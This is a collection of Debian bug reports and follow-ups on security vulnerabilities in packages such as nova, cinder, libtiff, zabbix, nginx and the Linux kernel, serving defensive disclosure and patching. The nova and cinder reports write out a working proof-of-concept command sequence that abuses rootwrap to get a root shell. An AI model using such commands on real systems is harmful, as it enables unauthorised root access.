Bug#883247: CVE-2017-16933: icinga2: root privilege escalation via prepare-dirs
Package: icinga2 Version: None X-Debbugs-CC: t...@security.debian.org secure-testing-t...@lists.alioth.debian.org Severity: grave Tags: security Hi, the following vulnerability was published for icinga2. CVE-2017-16933: | etc/initsystem/prepare-dirs in Icinga 2.x through 2.8.0 has a chown | call for a filename in a user-writable directory, which allows local | users to gain privileges by leveraging access to the $ICINGA2_USER | account for creation of a link. If you fix the vulnerability please also make sure to include the CVE (Common Vulnerabilities & Exposures) id in your changelog entry. For further information see: https://security-tracker.debian.org/tracker/CVE-2017-16933 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16933 https://github.com/Icinga/icinga2/issues/5793 Please adjust the affected versions in the BTS as needed. -- Henri Salo signature.asc Description: PGP signature
Bug#881796: CVE-2017-1001001: pluxml: XSS and missing httponly flag
Package: pluxml Version: 5.5-2 Severity: grave Tags: security upstream https://nvd.nist.gov/vuln/detail/CVE-2017-1001001 https://github.com/pluxml/PluXml/issues/253 PluXml version 5.6 is vulnerable to stored cross-site scripting vulnerability, within the article creation page, which can result in escalation of privileges. Two problems: - Cross-site scripting vulnerability with "writer" role - Missing HttpOnly flag -- Henri Salo signature.asc Description: PGP signature
Bug#855142: security bug closed without fix
Shouldn't this be closed AFTER the fix is available? Especially since this is a security issue. -- Henri Salo
Bug#830700: CVE-2016-5314: tiff: PixarLogDecode() heap-based buffer overflow
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Package: tiff Version: 4.0.6-1 Severity: critical Tags: security, fixed-upstream Hi LibTIFF maintainer(s), Kaixiang Zhang from Qihoo 36 and Mathias Svensson from Google discovered heap-based buffer overflow vulnerability from PixarLogDecode() function in libtiff/tif_pixarlog.c in the TIFF library, which may result in denial of service or the execution of arbitrary code if a malformed TIFF file is processed. Upstream has fixed this vulnerability in following commit (repository is a mirror of upstream CVS repository): https://github.com/vadz/libtiff/commit/391e77fcd217e78b2c51342ac3ddb7100ecacdd2 This was reported by several researchers simultaneously. CVE-2016-5314 upstream bug report: http://bugzilla.maptools.org/show_bug.cgi?id=2554 CVE-2016-5316 has been marked as duplicate of upstream bug #2554 as it is fixed by the same commit: http://bugzilla.maptools.org/show_bug.cgi?id=2556 http://www.openwall.com/lists/oss-security/2016/06/30/3 says: """I think this is a duplicate with CVE-2016-5320 and CVE-2016-5314. CVE-2016-5875 (buffer overrun in PixarLogDecode()) is CVE-2016-5314 (PixarLogDecode() out-of-bound writes) which causes CVE-2016-5320 (rgb2ycbcr command execution).""" Reproducers: http://bugzilla.maptools.org/attachment.cgi?id=654 http://bugs.fi/media/afl/libtiff/CVE-2016-5875.tif http://bugzilla.maptools.org/attachment.cgi?id=656 Please double check the situation before making changes to Debian source package. Feel free to contact me or Debian security team in case you have any questions. - -- Henri Salo -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBAgAGBQJXgmFSAAoJECet96ROqnV0xIMP/12NuYUO3NSqPkAk3C/35go5 aTItQmBr5DqG0a/wS/R5vR0FwyLbJ8FGh36hjXHCC7VBRiQfj4t1Vq7TAFn0c3jE pTcnxW/hzhPeRIQR7pdQkQMYQe4ODB9irL6m8EqH4uHhhE9mPJ9j6cUKGRhi25fx TO99Mtv8Aqlb9GO1rggaAQUiRN3E4E4xVE0g5Qlw4ad8FeP1IQSPHbYyGG1pUF20 os46/ODxaDqi3QLpla3rRAJVNQoiUhYoUmVfqgN4htaSTn28b/qPdZ+oQV1cpvLo A8g0RThuazgkRO4wGIMVsZVxFJnRPrkVZL2RW5fqF3efw39qHtopOvi5dAScyOgX dIqFlz8Yv9Tx9DQYzfVmp1rEtZL80Xd3D6cAdFbxUwFJq4ZN2sr2RTZXufrhlMm6 +N776cbidBR8j8jPKFZxQpgQWwC+h7SJmsuiZsO8hCkZopE0DJf8O/4j2sPioG6M ajHtlB63ed99eFb3Z+tl37z+6XogT33xslAe/Ux0muWpavoItWA9G5Kx1yBHGBVn 8k9xP889veqJVO2qzWo3r64MvTUltD7x1Y6fzOaPBUWrHU/mG+Epgk1KAEk3aGSt L6zkKhEYq0hLERWqY2hdVYD3HfPb+jaEkEc9eJNK6mQ0yzbQxws/uaXHOvA4ZOAm HcLaKK1BLe+6opMAZWRx =XDbp -END PGP SIGNATURE-
Bug#797729: information
I'm not sure why you are offensive or why your attitude is like that. Communication is important key to get changes to Debian. I am replying to this bug item so that you receive more information about Debian security related aspects. Please note that if you want some changes to Debian you need to create bug item per issue or work with the team or package maintainer to get patches applied. Offensive bug reports like this one does not probably get you to your goal. Please see for details: - Team website: https://www.debian.org/security/ - Wiki page: https://wiki.debian.org/Teams/Security - Meetings: https://wiki.debian.org/DebianSecurity/Meetings (latest meeting is not yet listed in here, which was held in DebConf) - IRC-channel: irc://irc.debian.org/debian-security - FAQ: https://www.debian.org/security/faq - List of security features: https://wiki.debian.org/Security/Features (not complete) - Embedded code copies: https://wiki.debian.org/EmbeddedCodeCopies Most of the actual security tracking work is done in Debian security-tracker. Please see: https://security-tracker.debian.org/tracker/ http://security-team.debian.org/security_tracker.html http://lists.alioth.debian.org/pipermail/secure-testing-team/ Could you submit a bug to issue tracker about one issue at the time without aggressive tone? -- Henri Salo
Bug#794560: WordPress 4.2.3 and earlier multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Package: wordpress Version: 4.2.3+dfsg-1 Severity: grave Tags: security, fixed-upstream This release addresses six issues, including three cross-site scripting vulnerabilities and a potential SQL injection that could be used to compromise a site, which were discovered by Marc-Alexandre Montpas of Sucuri, Helen Hou-Sandà of the WordPress security team, Netanel Rubin of Check Point, and Ivan Grigorov. It also includes a fix for a potential timing side-channel attack, discovered by Johannes Schmitt of Scrutinizer, and prevents an attacker from locking a post from being edited, discovered by Mohamed A. Baset. For more information please see: https://wordpress.org/news/2015/08/wordpress-4-2-4-security-and-maintenance-release/ http://openwall.com/lists/oss-security/2015/08/04/5 - -- Henri Salo -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iQIcBAEBAgAGBQJVwLJNAAoJECet96ROqnV08QwQAMJvwXTWaHZssqXCPTo77H1R vXHSu865JrpSjZkBruXA3yJzqefL8u1bCtxAMn1xIMYKCoweHvQyhce1ipBLM5NG CT9XGZUUPrvjAkiwNSkWnwm475ixH8AdsZvUXqQY5Yb2QcA/KBAPjMfu5IS12FTM PN3fg3OKOYgJlaVAzai/He1IMakzPyH9l+7NCa8lr1upJIJ1v5xyMzfTzyZ9hZnW dcpWFcP5/MjvkTGtqyDtc0s/Q5qHJPQEYYGvQTrGo9yo567t6xzjuVSHwWUhnlTT C41RV0VbjpPefhFcuR51wt0mMy77TB+DJh8lMl5XH5zQCE4/YjCPZ356I1EnKJ7g /2Xj0JbovF0b+eK+Xr+7VW8j8npf9gx2QALiQnFXS8EuaE4Aap2xxpDHLlqJiSl2 xK/+u67EnkkO1KRpztMNcSyUxEulQQZnEMD151Sg+8SanbfF5H4cHzea5zf8keTm EtPQ+48loWFe1N1c11xPgKLYU5SqOz5puwKqkzftD4mhnYarUrlulPy+enMVrM0o kMCnIyJWwo90pu3PGs4eT4XLsoxeyZMBJMjo2F6g4+eywl1/Hcw/qKMWi2Cau9IY GYm1KAZXl+X57heGyYj2nmZLidx3D8lX1ypGUtSXkIZ3EU5lZ2ZpGSPxONoYptkg 8HjdESDayI1Z6aHajdj7 =5NXI -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#783099: php5: Fileinfo on specific file causes spurious OOM and/or segfault
I reported this issue to Debian BTS to notify package maintainers and in the long run trying to get security issues fixed. Maintainers are not always following security issues in upstream and so on (not saying this about PHP). I verified that the segfault condition occurred and did not do more detailed analysis of the issue. If there is no security issue in PHP with the poc we can close this bug. -- Henri Salo -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#783099: php5: Fileinfo on specific file causes spurious OOM and/or segfault
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Source: php5 Version: 5.6.7+dfsg-1 Severity: grave Tags: security, upstream, fixed-upstream Hi, the following vulnerability was published for PHP5, When calling finfo::file() or finfo::buffer() with a crafted string, PHP will crash by either segfaulting or trying to allocate an large amount of memory (4GiB). This was found in the wild when a user uploaded a file (running finfo on arbitrary files uploaded by users is one of its main use cases.). I've since anonymised the file, and made it more minimal. At this stage, very small changes to the string make it produce different behaviour - removing the remaining 'a', 's', or 'y' characters, for instance, will allow finfo to process it fine. For further information see: https://bugs.php.net/bug.php?id=68819 https://git.php.net/?p=php-src.git;a=commitdiff;h=f938112c495b0d26572435c0be73ac0bfe642ecd - -- Henri Salo -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBAgAGBQJVN11hAAoJECet96ROqnV0NFwP/1WyM6/jYhMkuyyjIDuGJLR6 5agci0HcM64R5It7Dvoy7HPtP431Qg5XvtJBn2P5YRq9Kgh1g0T7NeA4jbQIQEQs lj/zO4zfBSnhCvkCbsqhLDYDASx1M2esXgfXy4EDejBPvVMSPtSr3GjVt9Ptufty /GgA3FRf+XDDNNDebGsDVvkKH5pAvK7QN8R8UsmG8uiEYP9+vdlwdAK5pykrWsGa yZEm7x/OXjETTnjIoz+0p89ExFBBuNyryhMQGVfiJxivTMHaHMBuZ/2BlBhIM0S2 VTf42JtlLTmG6NZW71OplY2kN1f+p+ADXy/OUtwbV700tuk58wIwt+r5Ymqa9wmA crO2xyNm2CgA0K6Vew0vEYBWVc7fFQQuGhQX6lKOwng3OXaM3Xo9BzEvrOGVrTgz sw7ilWb4kfUTjtZoAYVOqL0YTafMi3CzjmH3MzeFMyxMRtYlqgc7S+KrqJXWMX2A TlqA2WhAOMIHNG8xxuXdwlzzVRoPakY0Jkgx5XdUlU9QdNmeIljcxdPAIXHAeEAj IPSBQFUjAZABB7GWKgZcyJv6p2Z9nc5GkQ9RYm297QtGbPVYGUfmBZsJOloJfXIF V4dRZWkVoonbaC5WtjaGPyOIHnl35AZ7Hl4MkQ5JMzScbN3u1BooY1+NXNBsHTPL JLN2O58YQiTodP1AZWfx =y0h8 -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#770918: patches
Attached patches from upstream, which apply to 1.2.1-6. DSA should be created. --- Henri Salo --- src/libFLAC/stream_decoder.c.orig 2014-11-25 13:41:50.280032892 +0200 +++ src/libFLAC/stream_decoder.c 2014-11-25 13:48:39.697566936 +0200 @@ -94,7 +94,7 @@ * ***/ -static FLAC__byte ID3V2_TAG_[3] = { 'I', 'D', '3' }; +static const FLAC__byte ID3V2_TAG_[3] = { 'I', 'D', '3' }; /*** * @@ -1386,6 +1386,10 @@ id = 0; continue; } + + if(id = 3) + return false; + if(x == ID3V2_TAG_[id]) { id++; i = 0; --- src/libFLAC/stream_decoder.c.orig 2014-11-25 13:41:50.280032892 +0200 +++ src/libFLAC/stream_decoder.c 2014-11-25 13:46:21.862277460 +0200 @@ -2726,7 +2726,8 @@ if(decoder-private_-frame.header.blocksize predictor_order) { send_error_to_client_(decoder, FLAC__STREAM_DECODER_ERROR_STATUS_LOST_SYNC); decoder-protected_-state = FLAC__STREAM_DECODER_SEARCH_FOR_FRAME_SYNC; - return true; + /* We have received a potentially malicious bt stream. All we can do is error out to avoid a heap overflow. */ + return false; } } else { signature.asc Description: Digital signature
Bug#732300: info
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 With up-to-date jessie I can reproduce this issue with following commands. I think input device is correct, but not sure. If I run cat /dev/input/eventX I can see data in the terminal when I type something, but it is not the text I was writing. 1) logkeys --export-keymap=keymap.txt logkeys --start --keymap=keymap --output=output.txt echo abcdefghijklmnopqrstuvwxyz logkeys --kill 2) logkeys --start --output=output.txt echo abcdefghijklmnopqrstuvwxyz logkeys --kill - --- Henri Salo -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlRd5fMACgkQXf6hBi6kbk+MKwCfSu0W+ftSvAjlRpUaJSLqPs1/ MHAAn3Mrq0vxgtzLzg+5LekpeZ3egG38 =+Ba4 -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#732300: update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi, I can reproduce this issue without --keymap in the example. logkeys --start --output=output.txt typesomething logkeys --kill File output.txt contains gibberish. - --- Henri Salo -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlRZ8gsACgkQXf6hBi6kbk/l5ACggtihlzHFdts58WsuxMu2c9Rh i8MAoLJMHl0D5lBu5gh624g7zCVel6hD =mS2W -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#763759: [Secure-testing-team] Bug#763759: bash: please drop debian-specific privmode disablement patch
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Thu, Oct 02, 2014 at 10:09:53AM -0300, Henrique de Moraes Holschuh wrote: Package: bash Version: 4.2+dfsg-0.1+deb7u3 Severity: grave Tags: security Justification: user security hole There is this issue already open http://bugs.debian.org/720545 Can you verify that this new issue in BTS is duplicate? If it is I'd prefer that you comment there and we close this (not merge, so that discussion is easier to read/follow). Thank you for your work regarding Debian security. - --- Henri Salo -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlQtUScACgkQXf6hBi6kbk+NwgCgyuLY822x4wvcxRZVRshzd7CW Ul8AoLeoLJ67qszU6BrVxLDstzbV3w8Q =TfQ7 -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#687484: Status of CVE-2012-4414: SQL injection
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 What is current status of CVE-2012-4414? Information about the issue in http://www.openwall.com/lists/oss-security/2012/09/11/4 Marked as grave and security without any comments from maintainers. Plans to patch this issue? If not could you please give reasoning, thank you. - --- Henri Salo -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlQqS24ACgkQXf6hBi6kbk/cCQCdGwbC8Tk1kzx1Mjg5OHDAp7wI KcwAn0NnXCiW/G9CuOQGMRk2xUODZAtm =zrVO -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#758972: Please remove mojarra
Package: mojarra Version: 2.0.3-3 Severity: critical Tags: security Please remove mojarra source package from Debian as it has been unmaintained and contains several unfixed security vulnerabilities with no replies from maintainer. https://packages.debian.org/source/sid/mojarra http://packages.qa.debian.org/m/mojarra.html https://bugs.debian.org/cgi-bin/pkgreport.cgi?src=mojarra CVE-2012-2672: https://bugs.debian.org/677194 Jun 2012 CVE-2013-5855: https://bugs.debian.org/740586 Mar 2014 Moritz commented to this in private email: Unmaintained packages should be removed, but spring build-depends on one of the libs from mojarra: jmm@pisco:~$ build-rdeps libjsf-api-java Reverse Build-depends in main: -- libspring-java So it needs to be checked whether that can be dropped from Spring. If maintainer shows some activity I could help to get these issues fixed. --- Henri Salo signature.asc Description: Digital signature
Bug#758972: data
No need to remove if we can update it and definitely not suggesting that we remove all those dependencies (original email did also not suggest that). Please contact me in case you need help with those CVEs when you have spare time (off BTS preferred). All I want is to close those vulnerabilities. --- Henri Salo signature.asc Description: Digital signature
Bug#756334: question
Do you have an alternative solution? Maybe this could be extracted directly to source package and updated with an script? --- Henri Salo signature.asc Description: Digital signature
Bug#754655: polarssl: CVE-2014-4911: Denial of Service against GCM enabled servers and clients
Package: polarssl Version: 1.3.7-2 Severity: critical Tags: security, fixed-upstream Please see for details: https://polarssl.org/tech-updates/security-advisories/polarssl-security-advisory-2014-02 --- Henri Salo signature.asc Description: Digital signature
Bug#753579: nova: CVE-2013-1068: local privilege escalation
Package: nova-common Version: 2014.1.1-1 Severity: grave Tags: security, confirmed After installing nova-common file /etc/sudoers.d/nova-common is created. If /etc/sudoers contains #includedir /etc/sudoers.d nova is vulnerable to CVE-2013-1068 local privilege escalation. Vulnerability does not need working OpenStack installation. If I am correct OpenStack does not work without includedir configuration so it might be usually enabled in OpenStack instances. PoC: https://bugs.launchpad.net/ubuntu/+source/nova/+bug/1185019 echo [DEFAULT] /tmp/my-rootwrap.conf echo filters_path=/tmp/my-filters.d /tmp/my-rootwrap.conf mkdir /tmp/my-filters.d echo [Filters] /tmp/my-filters.d/my.filters echo my-shell: CommandFilter, /bin/sh, root /tmp/my-filters.d/my.filters sudo nova-rootwrap /tmp/my-rootwrap.conf sh id -- System Information: Debian Release: 7.5 APT prefers stable APT policy: (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 3.2.0-4-amd64 (SMP w/8 CPU cores) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL set to en_US.UTF-8) Shell: /bin/sh linked to /bin/dash signature.asc Description: Digital signature
Bug#753585: cinder: CVE-2013-1068: local privilege escalation
Package: cinder-common Version: 2014.1.1-2 Severity: grave Tags: security, confirmed After installing cinder-common file /etc/sudoers.d/cinder-common is created. If /etc/sudoers contains #includedir /etc/sudoers.d cinder is vulnerable to CVE-2013-1068 local privilege escalation. Vulnerability does not need working OpenStack installation. If I am correct OpenStack does not work without includedir configuration so it might be usually enabled in OpenStack instances. PoC: https://bugs.launchpad.net/ubuntu/+source/nova/+bug/1185019 echo [DEFAULT] /tmp/my-rootwrap.conf echo filters_path=/tmp/my-filters.d /tmp/my-rootwrap.conf mkdir /tmp/my-filters.d echo [Filters] /tmp/my-filters.d/my.filters echo my-shell: CommandFilter, /bin/sh, root /tmp/my-filters.d/my.filters sudo -n cinder-rootwrap /tmp/my-rootwrap.conf sh -c id --- Henri Salo signature.asc Description: Digital signature
Bug#751940: update
Do you have any more information about this? It is quite hard to fix security vulnerability without any details. --- Henri Salo signature.asc Description: Digital signature
Bug#751910: update
Upstream bug report: https://support.zabbix.com/browse/ZBX-8151 signature.asc Description: Digital signature
Bug#751910: zabbix: CVE-2014-3005: local file inclusion via XXE
Package: zabbix Version: 1:2.2.3+dfsg-1 Severity: grave Tags: security Advisory: http://seclists.org/fulldisclosure/2014/Jun/87 Below might be the fix, but please verify. --- Henri Salo svn diff -r46596:46600 Index: frontends/php/include/defines.inc.php === --- frontends/php/include/defines.inc.php (revision 46596) +++ frontends/php/include/defines.inc.php (revision 46600) @@ -835,6 +835,9 @@ define('ZBX_DEFAULT_IMPORT_HOST_GROUP', 'Imported hosts'); +// XML import flags +define('LIBXML_IMPORT_FLAGS', LIBXML_NONET); + // API errors define('ZBX_API_ERROR_INTERNAL', 111); define('ZBX_API_ERROR_PARAMETERS', 100); Index: frontends/php/include/classes/import/readers/CXmlImportReader.php === --- frontends/php/include/classes/import/readers/CXmlImportReader.php (revision 46596) +++ frontends/php/include/classes/import/readers/CXmlImportReader.php (revision 46600) @@ -32,7 +32,8 @@ */ public function read($string) { libxml_use_internal_errors(true); - $result = simplexml_load_string($string); + libxml_disable_entity_loader(true); + $result = simplexml_load_string($string, null, LIBXML_IMPORT_FLAGS); if (!$result) { $errors = libxml_get_errors(); libxml_clear_errors(); Index: frontends/php/include/classes/import/CXmlImport18.php === --- frontends/php/include/classes/import/CXmlImport18.php (revision 46596) +++ frontends/php/include/classes/import/CXmlImport18.php (revision 46600) @@ -390,12 +390,13 @@ return $array; } - public static function import($file) { + public static function import($source) { libxml_use_internal_errors(true); + libxml_disable_entity_loader(true); $xml = new DOMDocument(); - if (!$xml-loadXML($file)) { + if (!$xml-loadXML($source, LIBXML_IMPORT_FLAGS)) { $text = ''; foreach (libxml_get_errors() as $error) { switch ($error-level) { signature.asc Description: Digital signature
Bug#747166: CVE-2014-0196: pty layer race condition memory corruption
Package: linux Version: 3.14.2-1 Severity: grave Tags: security Crashes kernel from userland. Also works in linux-headers-3.2.0-4-amd64 PoC: http://pastebin.com/yTSFUBgZ More information: http://www.openwall.com/lists/oss-security/2014/05/05/6 https://bugzilla.novell.com/show_bug.cgi?id=875690 --- Henri Salo signature.asc Description: Digital signature
Bug#742059: nginx: CVE-2014-0133: SPDY heap buffer overflow
Source: nginx Version: 1.4.6-1 Severity: grave Tags: security, fixed-upstream http://nginx.org/en/security_advisories.html http://nginx.org/download/patch.2014.spdy2.txt Not vulnerable: 1.5.12+, 1.4.7+ Vulnerable: 1.3.15-1.5.11 --- Henri Salo signature.asc Description: Digital signature
Bug#728235: info
Confirmed. Maintainer do you know reason for this already or do you need help? --- Henri Salo signature.asc Description: Digital signature
Bug#726936: more information needed
What do you mean by this bug report? Please provide more information. --- Henri Salo signature.asc Description: Digital signature
Bug#697617: jenkins: CVE-2013-0158: remote code execution vulnerability
Hello, Is there something that I could help to get this bug fixed and closed? Please contact me in case you want any help. --- Henri Salo signature.asc Description: Digital signature
Bug#701115: status
What is the status of this issue? Fixes done in oC-SA-2013-006 are very important. A code executions vulnerability in ownCloud 4.5.6 and 4.0.11 and all prior versions allow authenticated remote attackers to execute arbitrary PHP code via unspecified POST parameters to translations.php in /core/ajax/ -- Henri Salo -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#699267: update
I do not know what I did wrong when I was reproducing this issue. Sorry about false information to bug-report. At least we got it fixed. -- Henri Salo -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#699267: ircd-hybrid: Denial of service vulnerability in hostmask.c:try_parse_v4_netmask()
Package: ircd-hybrid Version: 1:7.2.2.dfsg.2-6.2 Severity: grave Tags: security Mr. Bob Nomnomnom from Torland reported a denial of service security vulnerability in ircd-hybrid. Function hostmask.c:try_parse_v4_netmask() is using strtoul to parse masks. Documentation says strtoul can parse -number as well. Validation of input does not catch evil bits. I can give proof of concept if needed. Fixed in commit: http://svn.ircd-hybrid.org:8000/viewcvs.cgi/ircd-hybrid/trunk/src/hostmask.c?r1=1786r2=1785pathrev=1786 Fixed in: ircd-hybrid 8.0.6 I have requested CVE identifier for this vulnerability. Program received signal SIGSEGV, Segmentation fault. 0x0041c799 in try_parse_v4_netmask (text=value optimized out, addr=0x113e270, b=0x113e2f8) at hostmask.c:229 229 addb[bits / 8] = ~((1 (8 - bits % 8)) - 1); (gdb) bt #0 0x0041c799 in try_parse_v4_netmask (text=value optimized out, addr=0x113e270, b=0x113e2f8) at hostmask.c:229 #1 parse_netmask (text=value optimized out, addr=0x113e270, b=0x113e2f8) at hostmask.c:255 #2 0x0040c4ab in add_id (client_p=0x77f9a058, chptr=0x11264e8, banid=value optimized out, type=value optimized out) at channel_mode.c:233 #3 0x0040cd28 in chm_ban (client_p=0x77f9a058, source_p=0x77f9a058, chptr=0x11264e8, parc=value optimized out, parn=0x77565580, parv=0x2f, errors=0x7fffdd08, alev=2, dir=1, c=98 'b', d=0x0, chname=0x1126774 #foo) at channel_mode.c:803 #4 0x0040baac in set_channel_mode (client_p=value optimized out, source_p=value optimized out, chptr=value optimized out, member=value optimized out, parc=2, parv=0x8ed410, chname=0x1126774 #foo) at channel_mode.c:1785 #5 0x7fffee7655a4 in m_mode (client_p=0x77f9a058, source_p=0x77f9a058, parc=4, parv=0x8ed400) at m_mode.c:115 #6 0x00422d9f in parse_client_queued (client_p=0x77f9a058) at packet.c:216 #7 0x00422ee5 in read_packet (fd=0x10faa18, data=value optimized out) at packet.c:359 #8 0x00423ead in comm_select () at s_bsd_epoll.c:204 #9 0x0041f7f8 in io_loop (argc=0, argv=0x7fffe588) at ircd.c:237 #10 main (argc=0, argv=0x7fffe588) at ircd.c:670 -- Henri Salo -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#698916: update
I have manually verified this issue with https://github.com/FireFart/WordpressPingbackPortScanner -- Henri Salo -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#698490: CVE
CVE request http://www.openwall.com/lists/oss-security/2013/01/22/8 -- Henri Salo -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#698490: CVE needed?
Hello, Does this issue have CVE-identifier? I am happy to request one if there isn't one yet. - Henri Salo -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#697722: rails: CVE-2013-0156: Multiple vulnerabilities in parameter parsing in Action Pack
Package: rails Version: 2:2.3.14.2 Severity: grave Tags: security http://www.openwall.com/lists/oss-security/2013/01/08/14 https://groups.google.com/forum/#!topic/rubyonrails-security/61bkgvnSGTQ/discussion Multiple vulnerabilities in parameter parsing in Action Pack There are multiple weaknesses in the parameter parsing code for Ruby on Rails which allows attackers to bypass authentication systems, inject arbitrary SQL, inject and execute arbitrary code, or perform a DoS attack on a Rails application. This vulnerability has been assigned the CVE identifier CVE-2013-0156. Versions Affected: ALL versions Not affected: NONE Fixed Versions: 3.2.11, 3.1.10, 3.0.19, 2.3.15 snip This probably affects squeeze and wheezy too. Please contact me in case you need any help! - Henri Salo -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#688008: CVE requested
CVE-requested in oss-security: http://www.openwall.com/lists/oss-security/2012/09/21/8 - Henri Salo -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#688007: CVE-request done
CVE request: http://www.openwall.com/lists/oss-security/2012/09/20/7 - Henri Salo -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#688008: CVE
Does this issue have CVE-identifier? - Henri Salo -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#688007: CVE
Does this issue have CVE-identifier? - Henri Salo -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#685581: inn: CVE-2012-3523 prone to STARTTLS plaintext command injection
Package: inn Version: 1.7.2q-41 Severity: grave From oss-security mailing list: the STARTTLS implementation in INN's NNTP server for readers, nnrpd, before 2.5.3 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted sessions by sending a cleartext command that is processed after TLS is in place, related to a plaintext command injection attack, a similar issue to CVE-2011-0411. References: [1] https://www.isc.org/software/inn/2.5.3article [2] https://bugs.gentoo.org/show_bug.cgi?id=432002 [3] https://bugzilla.redhat.com/show_bug.cgi?id=850478 Relevant upstream patch (the 'diff -Nurp inn-2.5.2/nnrpd/misc.c inn-2.5.3/nnrpd/misc.c' part): [4] ftp://ftp.isc.org/isc/inn/inn-2.5.2-2.5.3.diff.gz http://www.openwall.com/lists/oss-security/2012/08/21/8 http://www.openwall.com/lists/oss-security/2012/08/21/12 - Henri Salo -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#683364: CVE-2012-3442/CVE-2012-3443/CVE-2012-3444: Django 1.3.1 and 1.4.0 security issues
On Thu, Aug 02, 2012 at 12:41:53PM +0200, Raphael Hertzog wrote: Hi, The stable update is ready here. Henri, please test it and report back whether it works well for you. http://people.debian.org/~hertzog/packages/python-django_1.2.3-3+squeeze3_i386.changes I'm ccing the release team to let them know about this security update. Here are the relevant infos: - stable is affected (fix in 1.2.3-3+squeeze3) - wheezy/unstable is affected (fix in 1.4.1-1) Please let me know whether I can proceed with the upload (once Henri confirmed that it worked well for him). Hello Raphael, After applying these patches my applications in Django and Django itself function normally. I did test this with normal amount of traffic. Do you think I should try to reproduce the security-issues? Patches are pretty much 1:1 with Django-patches. - Henri Salo -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#616673: resolved
Hello, Upstream bug-report https://bugzilla.gnome.org/show_bug.cgi?id=678661 now says status resolved. What is status of this in Debian? - Henri Salo -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#677018: [debian-mysql] Bug#677018: more information
On Tue, Jun 12, 2012 at 08:57:28AM +0100, Nicholas Bamber wrote: Henri, I seem to recall that this bug is fixed in 5.5.24 which actually is in testing. The migration is not yet complete and probably still has a week or two to go at the least. But does that change your calculations at all. What do you mean by calculations? Please close the bug if it is handled. At least running the oneliner in Debian squeeze MySQL-server using the client-package squeeze is not affected. - Henri Salo -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
